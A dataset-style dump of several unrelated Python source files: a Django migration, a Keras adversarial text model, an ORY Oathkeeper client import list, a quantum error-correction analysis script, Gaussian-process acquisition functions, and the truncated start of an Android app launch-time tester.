text stringlengths 38 1.54M |
|---|
# Generated by Django 3.0.3 on 2020-03-03 13:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='DataDb',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(blank=True, max_length=200)),
('date', models.DateField(null=True)),
('Project_Name', models.CharField(max_length=50, null=True)),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='CompanyDb',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Project_Name', models.CharField(max_length=50, unique=True)),
('Brand_Name', models.CharField(max_length=50)),
('Address', models.CharField(blank=True, max_length=255, null=True)),
('Phone_Number', models.CharField(blank=True, max_length=10, null=True)),
('Email', models.EmailField(blank=True, max_length=50, null=True)),
('Created', models.DateTimeField(auto_now_add=True, null=True)),
('Type', models.CharField(default='Company Theme', max_length=50)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
import keras.backend as K
from keras.layers import Dense, Input
from keras.models import Model
from keras.engine import Layer
import tensorflow as tf
from keras.utils import to_categorical
from keras.callbacks import ModelCheckpoint, History
from glob import glob
import numpy as np
from keras.backend.tensorflow_backend import set_session
import os.path
# Reverse gradient layer from https://github.com/michetonu/gradient_reversal_keras_tf/blob/master/flipGradientTF.py
# Added compute_output_shape for Keras 2 compatibility
def reverse_gradient(X, hp_lambda):
"""Flips the sign of the incoming gradient during training."""
try:
reverse_gradient.num_calls += 1
except AttributeError:
reverse_gradient.num_calls = 1
grad_name = "GradientReversal%d" % reverse_gradient.num_calls
@tf.RegisterGradient(grad_name)
def _flip_gradients(op, grad):
return [tf.negative(grad) * hp_lambda]
reverse_gradient.num_calls += 1
g = K.get_session().graph
with g.gradient_override_map({"Identity": grad_name}):
y = tf.identity(X)
print(grad_name)
return y
class GradientReversal(Layer):
"""Flip the sign of gradient during training."""
def __init__(self, hp_lambda, **kwargs):
super(GradientReversal, self).__init__(**kwargs)
self.supports_masking = False
self.hp_lambda = hp_lambda
def build(self, input_shape):
self.trainable_weights = []
def call(self, x, mask=None):
return reverse_gradient(x, self.hp_lambda)
def get_output_shape_for(self, input_shape):
return input_shape
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = {"hp_lambda": self.hp_lambda}
base_config = super(GradientReversal, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class A_BOW_TEST:
"""
Implements the Adversarial Selector with Bag of Words model (A+BOW)
from Deconfounded Lexicon Induction for Interpretable Social Science
using Keras.
"""
def __init__(
self,
x_dim,
hx=100,
ht=50,
hc=50,
inv_factor=1,
use_ensemble_model=False,
checkpoint_dir=None,
p=.1,
n=5,
):
assert n > 1
assert p > 0 and p <= 1
self.x_dim = x_dim
self.hx, self.ht, self.hc = hx, ht, hc
self.inv_factor = inv_factor
self.checkpoint_dir = "/tmp" if checkpoint_dir is None else checkpoint_dir
if not os.path.isdir(self.checkpoint_dir):
os.mkdir(self.checkpoint_dir)
self.use_ensemble_model = use_ensemble_model
self.p = p
self.n = n
if self.n % 2 == 0:
self.n -= 1
self.cpt_name = os.path.join(self.checkpoint_dir, "abow.{epoch:05d}.hdf5")
self.mcp = ModelCheckpoint(self.cpt_name, save_weights_only=True)
self.history = History()
self.model_paths = None
def _build_model(self):
K.clear_session()
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.125
sess = tf.Session(config=config)
set_session(sess)
x_input = Input((self.x_dim,), name="x_input")
e = Dense(self.hx, activation="relu", name="e")(x_input)
l = Dense(self.ht, activation="relu")(e)
t = Dense(2, activation="softmax", name="y")(l)
l = GradientReversal(self.inv_factor)(e)
l = Dense(self.hc, activation="relu")(l)
c = Dense(5, name="z")(l)
self.model = Model(x_input, [t, c])
self.model.compile(optimizer="adam", loss=["categorical_crossentropy","mean_squared_error"])
def fit(self, d, *args, **kwargs):
self._build_model()
tocat = lambda x: to_categorical(x, num_classes=2)
# fit with checkpointing
vd = kwargs.get("validation_data", ())
if type(vd) != tuple:
kwargs["validation_data"] = (vd.X, [tocat(vd.y), vd.z])
# fit with checkpointing
kwargs["callbacks"] = kwargs.get("callbacks", []) + [self.mcp, self.history]
self.model.fit(d.X, [tocat(d.y), d.z], *args, **kwargs)
yl, zl = (
np.array(self.history.history["y_loss"]),
np.array(self.history.history["z_loss"]),
)
nmodels = len(yl)
model_paths = np.array(
[self.cpt_name.format(epoch=epoch) for epoch in range(1, nmodels + 1)]
)
if self.use_ensemble_model:
self._select_n_best_models(d, yl, zl, model_paths)
else:
self._select_one_best_model(d, yl, zl, model_paths)
def predict(self, d, *args, **kwargs):
return self.model.predict(d.X)[0]
def _select_n_best_models(self, d, yl, zl, model_paths):
nmodels = len(model_paths)
# keep models in the top 10% performance when predicting y
k = int(self.p * nmodels)
midx_list = yl.argsort()[:k]
zidx_list = zl[midx_list].argsort()[::-1][: self.n]
self.model_paths = model_paths[midx_list[zidx_list]]
print("Using ensemble method with models {}".format(self.model_paths))
def _select_one_best_model(self, d, yl, zl, model_paths):
nmodels = len(model_paths)
# keep models in the top 10% performance when predicting y
k = int(self.p * nmodels)
midx_list = yl.argsort()[:k]
# keep the model that performs the worst on z
zidx = zl[midx_list].argmax()
midx = midx_list[zidx]
print(
"Reloading model {} with y loss {} and z loss {}".format(
model_paths[midx], yl[midx], zl[midx]
)
)
# load the selected model
self.model.load_weights(model_paths[midx]) |
# flake8: noqa
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from from ory_oathkeeper_client.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from ory_oathkeeper_client.model.create_rule_created import CreateRuleCreated
from ory_oathkeeper_client.model.create_rule_forbidden import CreateRuleForbidden
from ory_oathkeeper_client.model.create_rule_forbidden_body import CreateRuleForbiddenBody
from ory_oathkeeper_client.model.create_rule_internal_server_error import CreateRuleInternalServerError
from ory_oathkeeper_client.model.create_rule_internal_server_error_body import CreateRuleInternalServerErrorBody
from ory_oathkeeper_client.model.create_rule_unauthorized import CreateRuleUnauthorized
from ory_oathkeeper_client.model.create_rule_unauthorized_body import CreateRuleUnauthorizedBody
from ory_oathkeeper_client.model.decisions_forbidden import DecisionsForbidden
from ory_oathkeeper_client.model.decisions_forbidden_body import DecisionsForbiddenBody
from ory_oathkeeper_client.model.decisions_internal_server_error import DecisionsInternalServerError
from ory_oathkeeper_client.model.decisions_internal_server_error_body import DecisionsInternalServerErrorBody
from ory_oathkeeper_client.model.decisions_not_found import DecisionsNotFound
from ory_oathkeeper_client.model.decisions_not_found_body import DecisionsNotFoundBody
from ory_oathkeeper_client.model.decisions_unauthorized import DecisionsUnauthorized
from ory_oathkeeper_client.model.decisions_unauthorized_body import DecisionsUnauthorizedBody
from ory_oathkeeper_client.model.delete_rule_forbidden import DeleteRuleForbidden
from ory_oathkeeper_client.model.delete_rule_forbidden_body import DeleteRuleForbiddenBody
from ory_oathkeeper_client.model.delete_rule_internal_server_error import DeleteRuleInternalServerError
from ory_oathkeeper_client.model.delete_rule_internal_server_error_body import DeleteRuleInternalServerErrorBody
from ory_oathkeeper_client.model.delete_rule_not_found import DeleteRuleNotFound
from ory_oathkeeper_client.model.delete_rule_not_found_body import DeleteRuleNotFoundBody
from ory_oathkeeper_client.model.delete_rule_unauthorized import DeleteRuleUnauthorized
from ory_oathkeeper_client.model.delete_rule_unauthorized_body import DeleteRuleUnauthorizedBody
from ory_oathkeeper_client.model.get_rule_forbidden import GetRuleForbidden
from ory_oathkeeper_client.model.get_rule_forbidden_body import GetRuleForbiddenBody
from ory_oathkeeper_client.model.get_rule_internal_server_error import GetRuleInternalServerError
from ory_oathkeeper_client.model.get_rule_internal_server_error_body import GetRuleInternalServerErrorBody
from ory_oathkeeper_client.model.get_rule_not_found import GetRuleNotFound
from ory_oathkeeper_client.model.get_rule_not_found_body import GetRuleNotFoundBody
from ory_oathkeeper_client.model.get_rule_ok import GetRuleOK
from ory_oathkeeper_client.model.get_rule_unauthorized import GetRuleUnauthorized
from ory_oathkeeper_client.model.get_rule_unauthorized_body import GetRuleUnauthorizedBody
from ory_oathkeeper_client.model.get_well_known_forbidden import GetWellKnownForbidden
from ory_oathkeeper_client.model.get_well_known_forbidden_body import GetWellKnownForbiddenBody
from ory_oathkeeper_client.model.get_well_known_json_web_keys_internal_server_error import GetWellKnownJSONWebKeysInternalServerError
from ory_oathkeeper_client.model.get_well_known_json_web_keys_internal_server_error_body import GetWellKnownJSONWebKeysInternalServerErrorBody
from ory_oathkeeper_client.model.get_well_known_json_web_keys_ok import GetWellKnownJSONWebKeysOK
from ory_oathkeeper_client.model.get_well_known_ok import GetWellKnownOK
from ory_oathkeeper_client.model.get_well_known_unauthorized import GetWellKnownUnauthorized
from ory_oathkeeper_client.model.get_well_known_unauthorized_body import GetWellKnownUnauthorizedBody
from ory_oathkeeper_client.model.health_not_ready_status import HealthNotReadyStatus
from ory_oathkeeper_client.model.health_status import HealthStatus
from ory_oathkeeper_client.model.inline_response500 import InlineResponse500
from ory_oathkeeper_client.model.is_instance_alive_internal_server_error import IsInstanceAliveInternalServerError
from ory_oathkeeper_client.model.is_instance_alive_internal_server_error_body import IsInstanceAliveInternalServerErrorBody
from ory_oathkeeper_client.model.is_instance_alive_ok import IsInstanceAliveOK
from ory_oathkeeper_client.model.json_web_key import JsonWebKey
from ory_oathkeeper_client.model.json_web_key_set import JsonWebKeySet
from ory_oathkeeper_client.model.judge_forbidden import JudgeForbidden
from ory_oathkeeper_client.model.judge_forbidden_body import JudgeForbiddenBody
from ory_oathkeeper_client.model.judge_internal_server_error import JudgeInternalServerError
from ory_oathkeeper_client.model.judge_internal_server_error_body import JudgeInternalServerErrorBody
from ory_oathkeeper_client.model.judge_not_found import JudgeNotFound
from ory_oathkeeper_client.model.judge_not_found_body import JudgeNotFoundBody
from ory_oathkeeper_client.model.judge_unauthorized import JudgeUnauthorized
from ory_oathkeeper_client.model.judge_unauthorized_body import JudgeUnauthorizedBody
from ory_oathkeeper_client.model.list_rules_forbidden import ListRulesForbidden
from ory_oathkeeper_client.model.list_rules_forbidden_body import ListRulesForbiddenBody
from ory_oathkeeper_client.model.list_rules_internal_server_error import ListRulesInternalServerError
from ory_oathkeeper_client.model.list_rules_internal_server_error_body import ListRulesInternalServerErrorBody
from ory_oathkeeper_client.model.list_rules_ok import ListRulesOK
from ory_oathkeeper_client.model.list_rules_unauthorized import ListRulesUnauthorized
from ory_oathkeeper_client.model.list_rules_unauthorized_body import ListRulesUnauthorizedBody
from ory_oathkeeper_client.model.raw_message import RawMessage
from ory_oathkeeper_client.model.rule import Rule
from ory_oathkeeper_client.model.rule_handler import RuleHandler
from ory_oathkeeper_client.model.rule_match import RuleMatch
from ory_oathkeeper_client.model.swagger_create_rule_parameters import SwaggerCreateRuleParameters
from ory_oathkeeper_client.model.swagger_get_rule_parameters import SwaggerGetRuleParameters
from ory_oathkeeper_client.model.swagger_health_status import SwaggerHealthStatus
from ory_oathkeeper_client.model.swagger_json_web_key import SwaggerJSONWebKey
from ory_oathkeeper_client.model.swagger_json_web_key_set import SwaggerJSONWebKeySet
from ory_oathkeeper_client.model.swagger_list_rules_parameters import SwaggerListRulesParameters
from ory_oathkeeper_client.model.swagger_not_ready_status import SwaggerNotReadyStatus
from ory_oathkeeper_client.model.swagger_rule import SwaggerRule
from ory_oathkeeper_client.model.swagger_rule_handler import SwaggerRuleHandler
from ory_oathkeeper_client.model.swagger_rule_match import SwaggerRuleMatch
from ory_oathkeeper_client.model.swagger_rule_response import SwaggerRuleResponse
from ory_oathkeeper_client.model.swagger_rules_response import SwaggerRulesResponse
from ory_oathkeeper_client.model.swagger_update_rule_parameters import SwaggerUpdateRuleParameters
from ory_oathkeeper_client.model.swagger_version import SwaggerVersion
from ory_oathkeeper_client.model.update_rule_forbidden import UpdateRuleForbidden
from ory_oathkeeper_client.model.update_rule_forbidden_body import UpdateRuleForbiddenBody
from ory_oathkeeper_client.model.update_rule_internal_server_error import UpdateRuleInternalServerError
from ory_oathkeeper_client.model.update_rule_internal_server_error_body import UpdateRuleInternalServerErrorBody
from ory_oathkeeper_client.model.update_rule_not_found import UpdateRuleNotFound
from ory_oathkeeper_client.model.update_rule_not_found_body import UpdateRuleNotFoundBody
from ory_oathkeeper_client.model.update_rule_ok import UpdateRuleOK
from ory_oathkeeper_client.model.update_rule_unauthorized import UpdateRuleUnauthorized
from ory_oathkeeper_client.model.update_rule_unauthorized_body import UpdateRuleUnauthorizedBody
from ory_oathkeeper_client.model.upstream import Upstream
from ory_oathkeeper_client.model.version import Version
|
import sys
import json
import math
import itertools as it
import steane as st
import chper_wrapper as wrapper
import qcircuit_functions as qfun
#p1q, p2q = float(sys.argv[1]), float(sys.argv[2])
#ns, nt = float(sys.argv[3]), float(sys.argv[4])
error_model = 'ion_trap_eQual3'
output_folder = './MC_results/QECd3_flags/all_flags/ion_trap3/CNOT/'
# Define the error information
# For the subset sampler, these error rates are just place-holders;
# their exact values don't matter.
p1, p2, p_meas, p_prep, p_sm, p_cross, p_5q = 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1
error_dict, Is_after2q, Is_after1q, faulty_groups = wrapper.dict_for_error_model(
error_model=error_model,
p_1q=p1, p_2q=p2,
p_meas=p_meas, p_prep=p_prep,
p_sm=p_sm, p_cross=p_cross,
p_5q=p_5q)
# create the latt-surg circuit
#latt_circ = qfun.create_latt_surg_CNOT(False,True,True,False,True,True,True)
#brow.from_circuit(latt_circ, True)
#sys.exit(0)
# Define the list of error-prone gates
# For now, we have 6 groups: (a) preps and meas, (b) MS2, (c) I_idle, (d) I_cross,
# (e) 1-q gates, (f) MS5
#gates_indices = wrapper.gates_list_CNOT_general(latt_circ, faulty_groups)
#print [len(gate_kind) for gate_kind in gates_indices]
#sys.exit(0)
# create the transversal circuit
#CNOT_circ = st.Generator.transversal_CNOT_ion_trap(False, True)
#brow.from_circuit(CNOT_circ, True)
#sys.exit(0)
# Define the list of error-prone gates
# For now, we have 4 groups: (a) I_idle, (b) I_cross, (c) 1-q gates, (d) 2-q MS gates
#circ_list = [CNOT_circ.gates[0].circuit_list[0]]
#gates_indices = wrapper.gates_list_general(circ_list, faulty_groups)
#print [len(gate_kind) for gate_kind in gates_indices]
#sys.exit(0)
def total_perms6(perm_string):
'''
'''
list_perms = []
for perm in it.permutations(perm_string, 6):
#new_perm = '_'.join(perm)
new_perm = map(int,list(perm))
if new_perm not in list_perms:
list_perms += [new_perm]
return list_perms
def total_perms4(perm_string):
'''
'''
list_perms = []
for perm in it.permutations(perm_string, 4):
#new_perm = '_'.join(perm)
#new_perm = '0_' + new_perm + '_0'
new_perm = map(int,list(perm))
new_perm = [0] + new_perm + [0]
if new_perm not in list_perms:
list_perms += [new_perm]
return list_perms
w1_6, w1_4 = ['100000'], ['1000']
w2_6, w2_4 = ['200000','110000'], ['2000','1100']
w3_6, w3_4 = ['300000','210000','111000'], ['3000','2100','1110']
w4_6, w4_4 = ['400000','310000','220000','211000','111100'], ['4000','3100','2200','2110','1111']
w5_6 = ['500000','410000','320000','311000','221000','211100','111110']
w6_6 = ['600000','510000']
w5_4 = ['5000','4100','3200','3110','2210','2111']
w6_4 = ['6000','5100','4200','4110','3300','3210','3111','2220','2211']
w7_4 = ['7000','6100','5200','5110','4300','4210','4111','3310','3211']
w_6 = w1_6 + w2_6 + w3_6 + w4_6 + w5_6 + w6_6
w_4 = w1_4 + w2_4 + w3_4 + w4_4 + w5_4 + w6_4 + w7_4
w_perms6, w_perms4 = [[0,0,0,0,0,0]], [[0,0,0,0,0,0]]
for config in w_6:
w_perms6 += total_perms6(config)
for config in w_4:
w_perms4 += total_perms4(config)
results_latt = {'pX':{}, 'pZ':{}}
results_trans = {'pX':{}, 'pZ':{}}
total_jsons = 8
runs_per_json = 5000
total_runs = total_jsons*runs_per_json
latt_folder = output_folder + 'latt_surg/noQEC/XZ/'
for perm in w_perms6:
if sum(perm) == 0:
results_latt['pX'][tuple(perm)] = 0.
results_latt['pZ'][tuple(perm)] = 0.
continue
perm_folder = latt_folder + '_'.join(map(str,perm)) + '/'
if sum(perm) == 1:
if perm[-1] == 0:
abs_filename = perm_folder + '1.json'
json_file = open(abs_filename, 'r')
local_dict = json.load(json_file)
json_file.close()
results_latt['pX'][tuple(perm)] = local_dict['p_failX']
results_latt['pZ'][tuple(perm)] = local_dict['p_failZ']
else:
results_latt['pX'][tuple(perm)] = 0.
results_latt['pZ'][tuple(perm)] = 0.
else:
if perm[0]==0 and perm[1]==0 and perm[2]==0 and perm[3]==0 and perm[4]==0:
results_latt['pX'][tuple(perm)] = 0.
results_latt['pZ'][tuple(perm)] = 0.
else:
sum_failX, sum_failZ = 0, 0
for json_index in range(1,total_jsons+1):
abs_filename = perm_folder + '%i.json'%json_index
json_file = open(abs_filename, 'r')
local_dict = json.load(json_file)
json_file.close()
sum_failX += local_dict['n_failsX']
sum_failZ += local_dict['n_failsZ']
results_latt['pX'][tuple(perm)] = float(sum_failX)/float(total_runs)
results_latt['pZ'][tuple(perm)] = float(sum_failZ)/float(total_runs)
trans_folder = output_folder + 'transversal/noQEC/XZ/'
for perm in w_perms4:
if sum(perm) == 0:
results_trans['pX'][tuple(perm)] = 0.
results_trans['pZ'][tuple(perm)] = 0.
continue
abs_filename = trans_folder + '_'.join(map(str,perm)) + '.json'
json_file = open(abs_filename, 'r')
local_dict = json.load(json_file)
json_file.close()
results_trans['pX'][tuple(perm)] = local_dict['p_failX']
results_trans['pZ'][tuple(perm)] = local_dict['p_failZ']
# Physical error rates
regime = 'future'
T2 = {'current': 200., 'future': 2000.} # T2 times in ms
T_SM = {'current': 0.08, 'future': 0.03} # Separation/merging times in ms
# prep/meas, 2qMS, SM, cross, 1q, 5qMS
n_ps_current = [0.001,
0.01,
0.5*(1.-math.exp(-T_SM['current']/T2['current'])),
'p_cross',
5.e-5,
0.05]
n_ps_future = [1.e-4,
2.e-4,
0.5*(1.-math.exp(-T_SM['future']/T2['future'])),
'p_cross',
1.e-5,
0.001]
n_ps = {'current': n_ps_current, 'future': n_ps_future}
n_ps = n_ps[regime]
# number of gates in latt-surg CNOT: preps/meas, 2qMS, I_idle, I_cross, 1q, 5qMS.
n_gates_latt = [205, 200, 52908, 827, 428, 33]
# number of gates in transversal CNOT (preps/meas and 5qMS are 0)
n_gates_trans = [7, 1302, 448, 28]
list_ps = [i*1.e-5 for i in range(1,1000)]
output_string = 'descriptor p_cross pCNOT_phys p_lattX_lower p_lattX_upper p_lattZ_lower p_lattZ_upper p_transX_lower p_transX_upper p_transZ_lower p_transZ_upper\n'
for p in list_ps:
# When generating a Bell pair,
# the failure rate after a CNOT is 8p/15 for both X and Z errors
p_CNOT_phys = n_ps[1]*8./15.
n_ps[3] = p # p is the value of p_cross
p_occurrence_latt_total, p_occurrence_trans_total = 0., 0.
p_fail_lattX_lower, p_fail_lattZ_lower = 0., 0.
p_fail_transX_lower, p_fail_transZ_lower = 0., 0.
# first the lattice surgery
for perm in w_perms6:
p_occurrence_latt = wrapper.prob_for_subset_general(n_gates_latt, perm, n_ps)
p_occurrence_latt_total += p_occurrence_latt
p_fail_lattX = results_latt['pX'][tuple(perm)]*p_occurrence_latt
p_fail_lattX_lower += p_fail_lattX
p_fail_lattZ = results_latt['pZ'][tuple(perm)]*p_occurrence_latt
p_fail_lattZ_lower += p_fail_lattZ
p_fail_lattX_upper = p_fail_lattX_lower + (1.-p_occurrence_latt_total)
p_fail_lattZ_upper = p_fail_lattZ_lower + (1.-p_occurrence_latt_total)
# second transversal
for perm in w_perms4:
p_occurrence_trans = wrapper.prob_for_subset_general(n_gates_trans, perm[1:5], n_ps[1:5])
p_occurrence_trans_total += p_occurrence_trans
p_fail_transX = results_trans['pX'][tuple(perm)]*p_occurrence_trans
p_fail_transX_lower += p_fail_transX
p_fail_transZ = results_trans['pZ'][tuple(perm)]*p_occurrence_trans
p_fail_transZ_lower += p_fail_transZ
p_fail_transX_upper = p_fail_transX_lower + (1.-p_occurrence_trans_total)
p_fail_transZ_upper = p_fail_transZ_lower + (1.-p_occurrence_trans_total)
if p < 0.003:
output_string += '%.15f %.15f %.15f %.15f %.15f %.15f %.15f %.15f %.15f %.15f\n' %(p, p_CNOT_phys, p_fail_lattX_lower, p_fail_lattX_upper, p_fail_lattZ_lower, p_fail_lattZ_upper, p_fail_transX_lower, p_fail_transX_upper, p_fail_transZ_lower, p_fail_transZ_upper)
else:
output_string += '%.15f %.15f nan nan nan nan nan nan %.15f %.15f\n' %(p, p_CNOT_phys, p_fail_transZ_lower, p_fail_transZ_upper)
data_filename = 'comparison_latt_trans_failure_%s.dat' %regime
abs_filename = output_folder + data_filename
data_file = open(abs_filename, 'w')
data_file.write(output_string)
data_file.close()
|
import numpy as np
from GPyOpt.acquisitions import AcquisitionBase as GPyOptAcquisitionBase
from src.experiment.config_helpers import ConfigMixin
class AcquisitionBase(ConfigMixin):
pass
class AcquisitionModelMismatch(AcquisitionBase):
def __init__(self, *models, beta=2):
assert len(models) == 2, "It can only compute difference between two models."
self.model = models[0]
self.model_compare = models[1]
self.beta = beta
def __call__(self, X):
mean, var = self.model.get_statistics(X, full_cov=False)
mean2, var2 = self.model_compare.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
mean = np.mean(mean, axis=0)
var = np.mean(var, axis=0)
if mean2.ndim == 3:
mean2 = np.mean(mean2, axis=0)
return np.abs(mean - mean2) + self.beta * np.sqrt(var)
class QuadratureAcquisition(AcquisitionBase):
def __init__(self, model):
self.model = model
def __call__(self, X):
mean, var = self.model.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
var = np.mean(var, axis=0)
return np.sqrt(var)
# class StableOptAcq(AcquisitionBase):
# """The derivative approach can be seen as the first taylor approximation of this
# (or as the limiting case when delta -> 0).
# So useful when derivatives are not present or when correlation is across bigger distances.
# """
# def __init__(self, *models, beta=2):
# self.model = models[0]
# self.beta = beta
# def __call__(self, X):
# # TODO: maximize perturbation
# mean, var = self.model.get_statistics(X, full_cov=False)
# # aggregate hyperparameters dimension
# if var.ndim == 3:
# mean = np.mean(mean, axis=0)
# var = np.mean(var, axis=0)
# # Notice that we are interested in |∇f(x)|.
# return np.abs(mean) + self.beta * np.sqrt(var)
class CurvatureAcquisition(AcquisitionBase):
def __init__(self, model, use_var=True, beta=0):
self.model = model
self.use_var = use_var
self.beta = beta
def __call__(self, X):
mean, var = self.model.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
mean = np.mean(mean, axis=0)
var = np.mean(var, axis=0)
hessian_mean, hessian_var = self.model.predict_hessian(X, full_cov=False)
hess_norm = np.linalg.norm(hessian_mean, ord='fro', axis=(-2, -1))
hess_norm = hess_norm[:, None]
# Remove output dimensions
if self.use_var:
return hess_norm * np.sqrt(var) + self.beta * np.sqrt(var)
else:
return hess_norm
class CurvatureAcquisitionDistribution(AcquisitionBase):
"""Use this with MCMC sampling (not maximization).
"""
def __init__(self, model, beta=2):
self.model = model
self.beta = beta
def __call__(self, X):
mean, var = self.model.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
mean = np.mean(mean, axis=0)
var = np.mean(var, axis=0)
hessian_mean, hessian_var = self.model.predict_hessian(X, full_cov=False)
hess_norm = np.linalg.norm(hessian_mean, ord='fro', axis=(-2,-1))
return hess_norm + self.beta * np.sqrt(var)
class DerivativeAcquisition(AcquisitionBase):
"""Redundant but helpful for structure.
Should be extracted into a multi-object GP.
Usually we are optimizing R^D -> R.
Now R^D -> R^D...
First consider low dim:
- How do we weight the D partial gradients?
Using max we will explore peaks in any direction.
Assume we used mean. If all "the action" was along one dimension this might not be explored.
- Alternatively we could do the aggregation BEFORE fitting a GP thus avoiding multi-objectivity...
- What does exploration/exploitation mean in this setting?
Exploration will now learn an accurately representation of the gradient.
Seems like we will cover the whole domain well in the long run (i.e. not get stuck exploiting).
Now consider high-dim:
(Note: This approach becomes infeasible if dimensionality is not reduced (multi-objective GP is expensive I think!).
For Manifold learning we need gradients to flow through the function transformation.)
Conclusion:
Let's try with multi-objective GP on derivatives and max{mu + beta * var}.
First: 1D.
"""
def __init__(self, *models, beta=2):
self.model = models[0]
self.derivative_model = models[1]
self.beta = beta
def __call__(self, X):
mean, var = self.derivative_model.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
mean = np.mean(mean, axis=0)
var = np.mean(var, axis=0)
# Notice that we are interested in |∇f(x)|.
return np.abs(mean) + self.beta * np.sqrt(var)
# ------------------ GPyOpt --------------------
class GPyOptQuadratureAcquisition(GPyOptAcquisitionBase):
"""
GP-Confidence Bound acquisition function
:param model: GPyOpt class of model
:param space: GPyOpt class of domain
:param optimizer: optimizer of the acquisition. Should be a GPyOpt optimizer
:param cost_withGradients: function
:param jitter: positive value to make the acquisition more explorative
.. Note:: does not allow to be used with cost
"""
analytical_gradient_prediction = False
def __init__(self, model, space, optimizer=None, cost_withGradients=None, exploration_weight=2):
self.optimizer = optimizer
super(GPyOptQuadratureAcquisition, self).__init__(model, space, optimizer)
if cost_withGradients is not None:
print('The set cost function is ignored! LCB acquisition does not make sense with cost.')
def _compute_acq(self, x):
"""
Computes the GP-Lower Confidence Bound
"""
m, s = self.model.predict(x)
f_acqu = s
return f_acqu
def _compute_acq_withGradients(self, x):
"""
Computes the GP-Lower Confidence Bound and its derivative
"""
m, s, dmdx, dsdx = self.model.predict_withGradients(x)
f_acqu = s
df_acqu = dsdx
return f_acqu, df_acqu
class GPyOptAcquisitionModelMismatch(GPyOptAcquisitionBase):
"""
GP-Confidence Bound acquisition function
:param model: GPyOpt class of model
:param space: GPyOpt class of domain
:param optimizer: optimizer of the acquisition. Should be a GPyOpt optimizer
:param cost_withGradients: function
:param jitter: positive value to make the acquisition more explorative
.. Note:: does not allow to be used with cost
"""
analytical_gradient_prediction = False
def __init__(self, model, model2, space, optimizer=None, cost_withGradients=None, exploration_weight=2):
self.optimizer = optimizer
super(GPyOptAcquisitionModelMismatch, self).__init__(model, space, optimizer)
if cost_withGradients is not None:
print('The set cost function is ignored! LCB acquisition does not make sense with cost.')
self.model2 = model2
self.exploration_weight = exploration_weight
def _compute_acq(self, x):
"""
Computes the GP-Lower Confidence Bound
"""
m, s = self.model.predict(x)
m2, s2 = self.model2.predict(x)
f_acqu = np.abs(m - m2) + self.exploration_weight * np.sqrt(s)
return f_acqu
# def _compute_acq_withGradients(self, x):
# """
# Computes the GP-Lower Confidence Bound and its derivative
# """
# m, s, dmdx, dsdx = self.model.predict_withGradients(x)
# m2, s2, dmdx2, dsdx2 = self.model2.predict_withGradients(x)
#
# f_acqu = s
# df_acqu = dsdx
# return f_acqu, df_acqu
|
# -*- coding: utf-8 -*-
import os
import threading
import time
import datetime
import json
import shutil
import queue
from queue import Queue
from multiprocessing import Process
from subprocess import PIPE
from app import Android
from app_config.config import ZHIHU_PACKAGE_NAME
from app_config.config import ZHIHU_ACTIVITY_PATH
from app_config.config import TMP_IMG_ZHIHU_DIR
from app_config.config import WEIBO_PACKAGE_NAME
from app_config.config import WEIBO_ACTIVITY_PATH
from app_config.config import TMP_IMG_WEIBO_DIR
from app_config.config import TOP_TODAY_PACKAGE_NAME
from app_config.config import TOP_TODAY_ACTIVITY_PATH
from app_config.config import TMP_IMG_TOP_TODAY_DIR
from app_config.config import BAIDU_PACKAGE_NAME
from app_config.config import BAIDU_ACTIVITY_PATH
from app_config.config import TMP_IMG_BAIDU_DIR
from app_config.config import ZHIHU_SORTED_STAGE
from app_config.config import EXCLUDED_LIST
from app_config.config import ZHIHU_PERCENT
from app_config.config import BAIDU_PERCENT
from app_config.config import TOP_TODAY_PERCENT
from app_config.config import WEIBO_PERCENT
from msg_queue.queue_manager import QueueManager
from minicap.minicap import MinicapStream
from cal_time import CalTime
from record import Record
class AndroidTester(object):
def __init__(self, test_count, platform, device_id, package_name, activity_name, app_name, test_mode):
self.test_count = test_count
self.total_time = {} # 存储样式:total_time = {totaltime:tasks_times}
self.total_time_lock = threading.Lock()
self.platform = platform
self.device_id = device_id
self.android = Android(device_id)
self.apk_info = {}
self.result = []
self.package_name = package_name
self.activity_name = activity_name
self.app_name = app_name
self.model_code = 1
self.answer_queue = Queue()
self.msg_queue = Queue()
self.need_screenshot = 1
self.need_test = 1
self.task_pid_status = {}
self.start_dt = {}
if test_mode == 1:
self.need_screenshot = 1
self.need_test = 1
elif test_mode == 2:
self.need_screenshot = 1
self.need_test = 0
elif test_mode == 3:
self.need_screenshot = 0
self.need_test = 1
if self.package_name == ZHIHU_PACKAGE_NAME:
self.STAGE_PERCENT = ZHIHU_PERCENT
self.json_file_name = "start_time_zhihu.json"
self.model_code = 1
self.tmp_pic_dir = TMP_IMG_ZHIHU_DIR
elif self.package_name == WEIBO_PACKAGE_NAME:
self.STAGE_PERCENT = WEIBO_PERCENT
self.json_file_name = "start_time_weibo.json"
self.model_code = 2
self.tmp_pic_dir = TMP_IMG_WEIBO_DIR
elif self.package_name == TOP_TODAY_PACKAGE_NAME:
self.STAGE_PERCENT = TOP_TODAY_PERCENT
self.json_file_name = "start_time_top_today.json"
self.model_code = 3
self.tmp_pic_dir = TMP_IMG_TOP_TODAY_DIR
elif self.package_name == BAIDU_PACKAGE_NAME:
self.STAGE_PERCENT = BAIDU_PERCENT
